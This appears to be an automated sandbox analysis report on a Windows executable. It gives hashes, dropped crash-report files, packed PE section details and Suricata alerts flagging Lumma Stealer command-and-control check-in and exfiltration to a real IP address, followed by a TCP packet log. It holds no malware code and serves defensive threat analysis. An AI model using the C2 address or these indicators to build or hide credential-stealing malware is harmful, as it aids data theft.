                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.<./.P.i.d.

                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4A.tmp.xml

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4624
                                                                                                                                                              Entropy (8bit):4.499413771511221
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwWl8zsUJg77aI9LMHDWpW8VYSYm8M4JUVwLGFr5+q8pi9NXsI0X05d:uIjfSI75MHy7V6JD455D8lk5d
                                                                                                                                                              MD5:1D95DD1E20F6CF098819B45A3F1827AC
                                                                                                                                                              SHA1:D3A494DBFB8B76CC5D5AAE5E5C916B0DC89F32F3
                                                                                                                                                              SHA-256:746A3C0BF00579C2160FCEDE10F458FCEC473F0628959A391070B417865EA651
                                                                                                                                                              SHA-512:EAD03BCB5EDA2AFDC3BD252F1FFB9667CE12F2764625E052B8EF44A0378CEEFAFBBFA12E6171C43F893ABC2C36D5AB294237ED9395166A78A4E2011F76171588
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645205" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                              Entropy (8bit):4.468610901718255
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:jzZfpi6ceLPx9skLmb0f/ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNtjDH5Sh:fZHt/ZWOKnMM6bFpHj4h
                                                                                                                                                              MD5:9587D30EEAEF18D3F19A92B0D512D31A
                                                                                                                                                              SHA1:22181F2A2815E6B8F19F8E33333783520152A781
                                                                                                                                                              SHA-256:9657D7460FAA118CFAB309D7AAB481ACB8B7B739B876263CE717ABEE9C4B97D5
                                                                                                                                                              SHA-512:1F8B4C26FDB8BBCCBE07B1614264B69381D1060665591851F1787391A152F243A76A450917F49C3F25C4965F3E56D81B64078E92C974B76F2B9C3A8E8D0E3220
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U..............................................................................................................................................................................................................................................................................................................................................E...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):6.5580473294915596
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:fnCae9FQhg.exe
                                                                                                                                                              File size:2'960'384 bytes
                                                                                                                                                              MD5:f52f8ec2cddc2977f7f74fcfdf87d35f
                                                                                                                                                              SHA1:f9b514d83e0151d96bd0cae36a3271667cd7282b
                                                                                                                                                              SHA256:f6e61e5caac73a84ad8840618fc8808ab4a55628a1ae8dbddcf8814ae748096a
                                                                                                                                                              SHA512:a145c72fe3e444a948dbd4d8559b73d30a6390aa8b6cc967f80adbad5a84b269690c74f7d2f67d58cbed40e9ad353180aa4de712fe754cbb62325f07bec72fba
                                                                                                                                                              SSDEEP:49152:6vg/PB+M4DkpTmbkvXq+8nFWV+OHlQoiv:6vg/P8xYpTmCXq+8a+MQo
                                                                                                                                                              TLSH:4DD54B61E905B2CFD89A27789527CD42D95D03F4472548C3EEACA4BABD73CC217B6C28
                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.......................... 0.....v.....@.................................Y@..m..

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                                                              Static PE Info

                                                                                                                                                              General

                                                                                                                                                              Entrypoint:0x6ff000
                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                              Digitally signed:false
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:6
                                                                                                                                                              OS Version Minor:0
                                                                                                                                                              File Version Major:6
                                                                                                                                                              File Version Minor:0
                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                              Entrypoint Preview

                                                                                                                                                              Instruction
                                                                                                                                                              jmp 00007F1BB46EA8DAh

                                                                                                                                                              Data Directories

                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                              Sections

                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                              0x10000x520000x2640072f80ee348e639cb88b4bb0cf5c333efFalse0.9995595894607843data7.982075034799655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              audsrymt0x550000x2a90000x2a9000c93c9c27546c3da596e7ad9e16ac4d0aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              ilsizkav0x2fe0000x10000x400b227308ef76079a8458083905793bf5bFalse0.7978515625data6.188355822721415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .taggant0x2ff0000x30000x2200c3c3c37d537bda5b4cabd2ae44a16d89False0.06433823529411764DOS executable (COM)0.8041884164567935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                              Imports

                                                                                                                                                              DLLImport
                                                                                                                                                              kernel32.dlllstrcpy

                                                                                                                                                              Network Behavior

                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                              2024-12-24T11:22:15.764205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:16.534676+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649713104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:16.534676+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:17.763090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:18.546479+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649715104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:18.546479+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649715104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:20.679767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649721104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:21.742397+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649721104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:23.057783+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:25.786477+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:28.785092+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649745104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:31.182861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649752104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:36.142637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649766104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:36.779245+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649766104.21.36.201443TCP
                                                                                                                                                              2024-12-24T11:22:38.725809+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649773185.166.143.48443TCP
                                                                                                                                                              2024-12-24T11:22:41.110802+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64978416.182.108.137443TCP

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Dec 24, 2024 11:22:14.541177034 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:14.541235924 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:14.541338921 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:14.544733047 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:14.544754028 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:15.764101982 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:15.764204979 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:15.766496897 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:15.766524076 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:15.767047882 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:15.815248966 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:15.844242096 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:15.844285011 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:15.844413042 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:16.534683943 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:16.534800053 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:16.534878969 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.539614916 CET49713443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.539649963 CET44349713104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:16.549515963 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.549568892 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:16.549649000 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.550100088 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.550131083 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.762986898 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.763089895 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.764295101 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.764313936 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.764661074 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.765969992 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.766012907 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.766082048 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546523094 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546606064 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546643019 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546669006 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.546677113 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546694040 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546717882 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.546761990 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546802998 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.546823978 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.554883957 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.554960966 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.554977894 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.571687937 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.571779013 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.571799994 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.627779007 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.666169882 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.721476078 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.721494913 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740379095 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740430117 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740447998 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740602016 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740649939 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740741968 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740782976 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740808010 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740828991 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:19.465776920 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:19.465815067 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:19.465902090 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:19.466430902 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:19.466444969 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.679661989 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.679766893 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.681937933 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.681945086 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.682187080 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.683687925 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.683908939 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.683954000 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.742428064 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.742568970 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.742662907 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.742728949 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.742748022 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.845669031 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.845719099 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.845812082 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.846107006 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.846121073 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.057637930 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.057782888 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.059745073 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.059752941 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.059993029 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.061757088 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.062007904 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.062042952 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.062104940 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.107323885 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.959224939 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.959367990 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.959424019 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.110380888 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.110407114 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:24.573735952 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.573811054 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:24.573896885 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.574450016 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.574470997 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.786355019 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.786477089 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.787806034 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.787818909 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.788062096 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.789244890 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.789364100 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.789402962 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.789479971 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.789490938 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:26.720887899 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:26.721004009 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:26.721204996 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:26.732125998 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:26.732145071 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:27.572170019 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:27.572201967 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:27.572278023 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:27.572659969 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:27.572670937 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.784957886 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.785092115 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.786437035 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.786443949 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.786773920 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.788058043 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.788158894 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.788170099 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.557058096 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.557167053 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.557212114 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.557332039 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.557348967 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.970520020 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.970572948 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.970690966 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.971062899 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.971080065 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.182782888 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.182861090 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.184770107 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.184778929 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.185034990 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.186826944 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.188069105 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.188110113 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.188225985 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.188266993 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.188378096 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.188450098 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.188577890 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:31.188611031 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.188749075 CET49752443192.168.2.6104.21.36.201
